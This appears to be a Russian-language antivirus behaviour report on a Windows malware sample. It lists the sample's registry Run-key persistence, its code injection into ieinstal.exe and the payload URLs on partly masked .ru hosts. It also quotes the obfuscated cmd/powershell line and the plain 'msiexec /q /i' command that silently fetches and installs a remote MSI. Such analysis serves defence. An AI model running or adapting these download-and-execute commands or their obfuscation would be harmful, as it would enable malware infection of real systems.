Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'rendegravningers' = '%TEMP%\papmlken\ISTANDSTTELSERNES.exe'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://ff#h.ru/jj.msi
Внедряет код в
следующие пользовательские процессы:
- ieinstal.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\papmlken\istandsttelsernes.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ff#h.ru/jj.msi
- http://br###themlrd.ru/Host9_kEvSa4.bin
- http://df#d.ru/Host9_kEvSa4.bin
UDP
- DNS ASK ff#h.ru
- DNS ASK br###themlrd.ru
- DNS ASK df#d.ru
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msia230.tmp'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://ff#h.ru/jj.msi' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://ff#h.ru/jj.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://ff#h.ru/jj.msi
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'
